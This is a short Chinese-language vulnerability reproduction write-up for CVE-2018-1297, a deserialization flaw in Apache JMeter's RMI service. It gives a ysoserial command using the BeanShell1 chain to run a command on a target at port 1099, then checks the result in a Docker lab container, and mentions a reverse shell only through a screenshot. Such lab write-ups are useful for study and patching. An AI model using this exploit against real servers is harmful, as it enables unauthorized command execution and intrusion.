001-（CVE-2018-1297）Apache Jmeter RMI 反序列化命令执行漏洞-棉花糖会员站

# （CVE-2018-1297）Apache Jmeter RMI 反序列化命令执行漏洞

## 一、漏洞简介

Apache JMeter是美国阿帕奇（Apache）软件基金会的一套使用Java语言编写的用于压力测试和性能测试的开源软件。其2.x版本和3.x版本中存在反序列化漏洞，攻击者可以利用该漏洞在目标服务器上执行任意命令。

## 二、漏洞影响

Apache JMeter 2.x版本

Apache JMeter 3.x版本

## 三、复现过程

直接使用ysoserial即可进行利用：

“`
java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.RMIRegistryExploit ip 1099 BeanShell1 ‘touch /tmp/success’

“`

我们使用的是BeanShell1这条利用链。使用`docker-compose exec jmeter bash`进入容器，可见`/tmp/success`已成功创建：

![1.png](/static/lingzu/images/6abfab811a054cbdb0217774907140de.png)

反弹shell:

![2.png](/static/lingzu/images/59d09b33168042b2be2a22e6d6d704f8.png)

文章版权归作者所有，未经允许请勿转载。

THE END

001-（CVE-2018-1297）Apache Jmeter RMI 反序列化命令执行漏洞